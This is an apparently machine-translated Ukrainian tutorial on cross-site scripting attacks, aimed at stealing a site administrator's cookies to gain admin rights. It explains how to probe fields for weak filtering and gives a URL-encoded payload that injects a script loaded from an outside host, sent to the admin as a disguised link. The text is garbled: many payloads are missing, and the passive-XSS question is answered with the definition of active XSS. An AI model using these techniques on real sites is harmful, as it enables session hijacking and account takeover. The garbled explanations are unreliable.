### Як використовують XSS.
Для початку нам потрібно знати що таке Cookie.
Якщо ви знаєте, можете пропустити.
Cookie служать для збереження облікових даних сайту на комп'ютері відвідувач.
Якщо ви зареєструвалися на сайті під ніком 'blabluble', то сайт зберіг у вас на комп'ютері файл з cookies, де закодовані ваші дані.
А якщо ви є адмін і у вас є доступ до сайту, а я - юзер, який вкрав у вас (адміна) cookies, то я можу спокійно зайти на сайт, і сайт мене визначає як 'admin' - у мене будуть адміністраторські права.
Для зміни (підстановки вкрадених) кук раджу используваемих прогу CookieEdit для IE або вбудовані функції в Опері і Фаєрфокс.
### Що таке XSS-атака?
XSS атаки - це атаки не на сам сайт, а на користувачів сайту.
XSS - це недоробка в фільтрі, додатку.
Бувають пасивні XSS і активні XSS.
Що таке пасивні XSS?
Активні - це XSS, які, не вимагають ніяких додаткових дій з боку жертви - їй достатньо лише відкрити сторінку з вашим XSS та ява-код виконається автоматично.
Завдяки своїй автоматизированности - вони дуже корисні і цінні.
Наприклад, активні ХСС існують в BB-тегах через недостатню фільтрації, коли ви залишаєте повідомлення на форумі # 092; Книзі відгуків # 092; чаті, яке буде завжди активний при кожному оновленні.
### Отже, перейду конкретно до того, як знайти в даному сайті XSS.
Як дізнатися, що XSS на даному сайті проходить?
Жахлива распрастраннёная узявімость типу
Намагаємося вставити в усі різні поля цей скрипт. якщо вийшло повідомлення значить скрипт обробився і виконався.
Сама распостраненая XSS (наблюдаеться у всіх місцях де погана фільтрація):
Вся суть в ">.
Давайте подумаємо, що ми робимо, коли вводимо в поле ">. що відбувається?
Ми вводимо в форму
якийсь змінної прісваіваеться значення поля. Мінлива обробляється, "> виполняеться, закриває
скрипт і випролняет
Ця XSS сама распостраненая в пошукових системах:
Переглядаємо всі поля сайту і намагаємося вставити
Якщо вийшло повідомлення - ви знайшли XSS.
### А як визначити є фільтр чи ні?
Просто в будь-яке поле вводимо: ''; # 33; - "<########>=
Далі відкриваємо html сторінку і шукаємо слово "########"
і дивись наступні сиволов ..
якщо <> так і залишилися то це первай ознака вразливості - значить фільтр має дірку.
Якщо, " '# 092; символи залишилися такими, як були введені - це друга ознака вразливості - можливі додаткові символи до подальшої XSS атаки.
Потім, якщо відкривши HTML, ви не виявили <> то швидше за все дірка у фільтрі.
Якщо відкривши HTML ви виявили, що <> замінені на інші символи, то це облом - фільтр по крайней
міру функціонує нормально.
Можливо ще ввести в поле для перевірки фільтрації ось так: "><>' "`, / # 092;? @%
Розглянемо випадок якщо фільтр з'їдає <>
У цьому випадку існує ймовірність дірки.
Наприклад, у фільтра умова з'їдати
- 2) Можна ще робити ось так:
цей спосіб більш надійний.
% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A% 2A% 2A% 2E% 72% 75% 2F% 6. 6% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74% 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6A% 7. 3% 2E% 6A% 73% 3E% 3C% 2F% 73 % 63% 72% 69% 70% 74% 3E
це був закодований:
- 3) Особливо шифрування необхідно не тільки для обману фільтрів, але і для обману адмін при використанні пасивної ХСС.
Що робить document.location.href ви запитаєте мене? )). це ява-код, який без запиту переходить на вказаній сайт Так чо ж у нас виходить, дали ми лінк адміну, і він зайшов на наш сайт, ось що робиться. його швидко кидає на
% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A% 2A% 2A% 2E% 72% 75% 2F% 6. 6% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74% 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6A% 7. 3% 2E% 6A% 73% 3E% 3C% 2F% 73 % 63% 72% 69% 70% 74% 3E
а це вже і є наш Xss в зашифрованістю вигляді.
Примітка: це подіє тільки тоді, коли Xss буде належати адміну сайту якому ви кинули лінк.